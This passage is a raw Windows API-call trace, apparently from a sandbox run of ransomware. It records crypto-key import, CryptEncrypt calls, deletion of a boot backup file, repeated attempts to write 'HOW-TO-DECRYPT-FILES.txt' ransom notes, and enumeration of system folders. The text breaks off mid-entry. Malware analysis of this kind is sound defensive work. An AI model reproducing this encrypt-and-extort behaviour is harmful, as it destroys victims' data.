(in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemFree (pv=0x3aeb80) [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemFree (pv=0x3aeb80) [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemFree (pv=0x3aeb80) [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemFree (pv=0x3aeb80) [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.803] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.803] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.803] GetLastError () returned 0x0 [0044.804] CoTaskMemFree (pv=0x3aeb80) [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.804] GetLastError () returned 0x0 [0044.804] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.804] GetLastError () returned 0x0 [0044.804] CoTaskMemFree (pv=0x3aeb80) [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.804] GetLastError () returned 0x0 [0044.804] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.804] GetLastError () returned 0x0 [0044.804] CoTaskMemFree (pv=0x3aeb80) [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.804] GetLastError () returned 0x0 [0044.804] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.804] GetLastError () returned 0x0 [0044.804] CoTaskMemFree (pv=0x3aeb80) [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.804] GetLastError () returned 0x0 [0044.804] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.804] GetLastError () returned 0x0 [0044.804] CoTaskMemFree (pv=0x3aeb80) [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 1 [0044.804] GetLastError () returned 0x0 [0044.804] CoTaskMemAlloc (cb=0x20) returned 0x3aeb80 [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x3aeb80, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x3aeb80, pdwDataLen=0x18ee50) returned 1 [0044.804] GetLastError () returned 0x0 [0044.804] CoTaskMemFree (pv=0x3aeb80) [0044.804] CryptGetProvParam (in: hProv=0x37c4e8, dwParam=0x1, pbData=0x0, pdwDataLen=0x18ee50, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18ee50) returned 0 [0044.804] GetLastError () returned 0x103 [0044.851] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c3064c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ee6c | out: phKey=0x18ee6c*=0x360ae0) returned 1 [0044.851] GetLastError () returned 0x103 [0044.852] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0044.852] GetLastError () returned 0x103 [0044.859] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0044.859] GetLastError () returned 0x103 [0044.859] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ee28 | out: phKey=0x18ee28*=0x360b20) returned 1 [0044.859] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0044.859] GetLastError () returned 0x103 [0044.860] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1c5d698*=0x1, dwFlags=0x0) returned 1 [0044.860] GetLastError () returned 0x103 [0044.860] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1c5d664, dwFlags=0x0) returned 1 [0044.860] GetLastError () returned 0x103 [0044.861] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c5d6e0*, pdwDataLen=0x18eeb8*=0x2100, dwBufLen=0x2100 | out: pbData=0x1c5d6e0*, pdwDataLen=0x18eeb8*=0x2100) returned 1 [0044.862] GetLastError () returned 0x103 [0044.862] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c6190c*, pdwDataLen=0x18eed0*=0x10, dwBufLen=0x10 | out: pbData=0x1c6190c*, pdwDataLen=0x18eed0*=0x10) returned 1 [0044.862] GetLastError () returned 0x103 [0044.863] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c6193c*, pdwDataLen=0x18eed8*=0x0, dwBufLen=0x10 | out: pbData=0x1c6193c*, pdwDataLen=0x18eed8*=0x10) returned 1 [0044.863] GetLastError () returned 0x103 [0044.863] CryptDestroyKey (hKey=0x360ae0) returned 1 [0044.863] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0044.863] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0044.863] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x18e974, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0044.863] GetLastError () returned 0x103 [0044.863] SetErrorMode (uMode=0x1) returned 0x0 [0044.863] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.863] GetLastError () returned 0x5 [0044.864] SetErrorMode (uMode=0x0) returned 0x1 [0044.865] GetFullPathNameW (in: lpFileName="C:\\BOOTSECT.BAK", nBufferLength=0x105, lpBuffer=0x18e9f8, lpFilePart=0x0 | out: lpBuffer="C:\\BOOTSECT.BAK", lpFilePart=0x0) returned 0xf [0044.865] GetLastError () returned 0x5 [0044.865] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0044.866] GetLastError () returned 0x5 [0044.868] GetFullPathNameW (in: lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e97c, lpFilePart=0x0 | out: lpBuffer="C:\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x1b [0044.868] GetLastError () returned 0x5 [0044.868] SetErrorMode (uMode=0x1) returned 0x0 [0044.868] CreateFileW (lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.868] GetLastError () returned 0x5 [0044.869] SetErrorMode (uMode=0x0) returned 0x1 [0044.869] GetFullPathNameW (in: lpFileName="C:\\config.sys", nBufferLength=0x105, lpBuffer=0x18ead0, lpFilePart=0x0 | out: lpBuffer="C:\\config.sys", lpFilePart=0x0) returned 0xd [0044.870] GetLastError () returned 0x5 [0044.870] SetErrorMode (uMode=0x1) returned 0x0 [0044.870] GetFileAttributesExW (in: lpFileName="C:\\config.sys" (normalized: "c:\\config.sys"), fInfoLevelId=0x0, lpFileInformation=0x1c84cdc | out: lpFileInformation=0x1c84cdc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cdd6f43, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x5cdd6f43, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x54e43b7c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xa)) returned 1 [0044.870] GetLastError () returned 0x5 [0044.870] SetErrorMode (uMode=0x0) returned 0x1 [0044.871] GetFullPathNameW (in: lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e97c, lpFilePart=0x0 | out: lpBuffer="C:\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x1b [0044.871] GetLastError () returned 0x5 [0044.871] SetErrorMode (uMode=0x1) returned 0x0 [0044.871] CreateFileW (lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.872] GetLastError () returned 0x5 [0044.873] SetErrorMode (uMode=0x0) returned 0x1 [0044.873] GetFullPathNameW (in: lpFileName="C:\\hiberfil.sys", nBufferLength=0x105, lpBuffer=0x18ead0, lpFilePart=0x0 | out: lpBuffer="C:\\hiberfil.sys", lpFilePart=0x0) returned 0xf [0044.873] GetLastError () returned 0x5 [0044.873] SetErrorMode (uMode=0x1) returned 0x0 [0044.873] GetFileAttributesExW (in: lpFileName="C:\\hiberfil.sys" (normalized: "c:\\hiberfil.sys"), fInfoLevelId=0x0, lpFileInformation=0x1ca2608 | out: lpFileInformation=0x1ca2608*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.873] GetLastError () returned 0x20 [0044.873] SetErrorMode (uMode=0x0) returned 0x1 [0044.873] SetErrorMode (uMode=0x1) returned 0x0 [0044.873] FindFirstFileW (in: lpFileName="C:\\hiberfil.sys", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0044.873] GetLastError () returned 0x20 [0044.873] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0044.873] SetErrorMode (uMode=0x0) returned 0x1 [0044.875] GetFullPathNameW (in: lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e97c, lpFilePart=0x0 | out: lpBuffer="C:\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x1b [0044.875] GetLastError () returned 0x20 [0044.875] SetErrorMode (uMode=0x1) returned 0x0 [0044.875] CreateFileW (lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.875] GetLastError () returned 0x5 [0044.877] SetErrorMode (uMode=0x0) returned 0x1 [0044.877] GetFullPathNameW (in: lpFileName="C:\\pagefile.sys", nBufferLength=0x105, lpBuffer=0x18ead0, lpFilePart=0x0 | out: lpBuffer="C:\\pagefile.sys", lpFilePart=0x0) returned 0xf [0044.877] GetLastError () returned 0x5 [0044.877] SetErrorMode (uMode=0x1) returned 0x0 [0044.877] GetFileAttributesExW (in: lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), fInfoLevelId=0x0, lpFileInformation=0x1cc001c | out: lpFileInformation=0x1cc001c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0044.877] GetLastError () returned 0x20 [0044.877] SetErrorMode (uMode=0x0) returned 0x1 [0044.877] SetErrorMode (uMode=0x1) returned 0x0 [0044.877] FindFirstFileW (in: lpFileName="C:\\pagefile.sys", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0044.877] GetLastError () returned 0x20 [0044.877] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0044.877] SetErrorMode (uMode=0x0) returned 0x1 [0044.879] GetFullPathNameW (in: lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e97c, lpFilePart=0x0 | out: lpBuffer="C:\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x1b [0044.879] GetLastError () returned 0x20 [0044.879] SetErrorMode (uMode=0x1) returned 0x0 [0044.879] CreateFileW (lpFileName="C:\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0044.879] GetLastError () returned 0x5 [0044.881] SetErrorMode (uMode=0x0) returned 0x1 [0044.881] GetFullPathNameW (in: lpFileName="C:\\$Recycle.Bin", nBufferLength=0x105, lpBuffer=0x18ead8, lpFilePart=0x0 | out: lpBuffer="C:\\$Recycle.Bin", lpFilePart=0x0) returned 0xf [0044.881] GetLastError () returned 0x5 [0044.884] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x18ead8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0044.884] GetLastError () returned 0x5 [0044.884] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0044.884] GetLastError () returned 0x5 [0044.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e9fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.884] GetLastError () returned 0x5 [0044.884] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x18e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0044.884] GetLastError () returned 0x5 [0044.884] SetErrorMode (uMode=0x1) returned 0x0 [0044.884] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0044.884] GetLastError () returned 0x5 [0044.884] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.884] GetLastError () returned 0x5 [0044.884] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.884] GetLastError () returned 0x5 [0044.885] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.885] GetLastError () returned 0x5 [0044.885] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.885] GetLastError () returned 0x5 [0044.885] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.885] GetLastError () returned 0x5 [0044.885] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.885] GetLastError () returned 0x5 [0044.885] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.885] GetLastError () returned 0x5 [0044.885] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.885] GetLastError () returned 0x5 [0044.885] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.885] GetLastError () returned 0x5 [0044.886] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.886] GetLastError () returned 0x5 [0044.886] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.886] GetLastError () returned 0x5 [0044.886] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.886] GetLastError () returned 0x5 [0044.886] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.886] GetLastError () returned 0x5 [0044.886] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.886] GetLastError () returned 0x5 [0044.886] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.886] GetLastError () returned 0x5 [0044.886] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.886] GetLastError () returned 0x5 [0044.886] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.886] GetLastError () returned 0x5 [0044.887] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.887] GetLastError () returned 0x5 [0044.887] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.887] GetLastError () returned 0x5 [0044.887] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.887] GetLastError () returned 0x5 [0044.887] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.887] GetLastError () returned 0x5 [0044.887] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.887] GetLastError () returned 0x5 [0044.887] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.887] GetLastError () returned 0x5 [0044.887] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.887] GetLastError () returned 0x5 [0044.888] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.888] GetLastError () returned 0x5 [0044.888] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.888] GetLastError () returned 0x5 [0044.888] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.888] GetLastError () returned 0x5 [0044.888] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.888] GetLastError () returned 0x5 [0044.888] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.888] GetLastError () returned 0x5 [0044.888] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.888] GetLastError () returned 0x5 [0044.888] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.888] GetLastError () returned 0x5 [0044.888] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.889] GetLastError () returned 0x12 [0044.889] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0044.889] SetErrorMode (uMode=0x0) returned 0x1 [0044.889] GetFullPathNameW (in: lpFileName="C:\\Boot", nBufferLength=0x105, lpBuffer=0x18e9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Boot", lpFilePart=0x0) returned 0x7 [0044.889] GetLastError () returned 0x12 [0044.889] SetErrorMode (uMode=0x1) returned 0x0 [0044.889] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0044.889] GetLastError () returned 0x12 [0044.889] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.889] GetLastError () returned 0x12 [0044.889] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.889] GetLastError () returned 0x12 [0044.889] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.889] GetLastError () returned 0x12 [0044.889] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.889] GetLastError () returned 0x12 [0044.890] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.890] GetLastError () returned 0x12 [0044.890] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.890] GetLastError () returned 0x12 [0044.890] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.890] GetLastError () returned 0x12 [0044.890] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.890] GetLastError () returned 0x12 [0044.890] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.890] GetLastError () returned 0x12 [0044.890] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.890] GetLastError () returned 0x12 [0044.890] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.890] GetLastError () returned 0x12 [0044.890] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.890] GetLastError () returned 0x12 [0044.890] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.890] GetLastError () returned 0x12 [0044.890] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.890] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.891] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.891] GetLastError () returned 0x12 [0044.892] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.892] GetLastError () returned 0x12 [0044.892] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.892] GetLastError () returned 0x12 [0044.892] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.892] GetLastError () returned 0x12 [0044.892] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.892] GetLastError () returned 0x12 [0044.892] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.892] GetLastError () returned 0x12 [0044.892] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0044.892] GetLastError () returned 0x12 [0044.892] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0044.892] GetLastError () returned 0x12 [0044.892] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0044.892] SetErrorMode (uMode=0x0) returned 0x1 [0044.892] GetFullPathNameW (in: lpFileName="C:\\Boot\\BCD", nBufferLength=0x105, lpBuffer=0x18ea64, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\BCD", lpFilePart=0x0) returned 0xb [0044.892] GetLastError () returned 0x12 [0044.895] SetErrorMode (uMode=0x1) returned 0x0 [0044.895] GetFileAttributesExW (in: lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), fInfoLevelId=0x0, lpFileInformation=0x1b23144 | out: 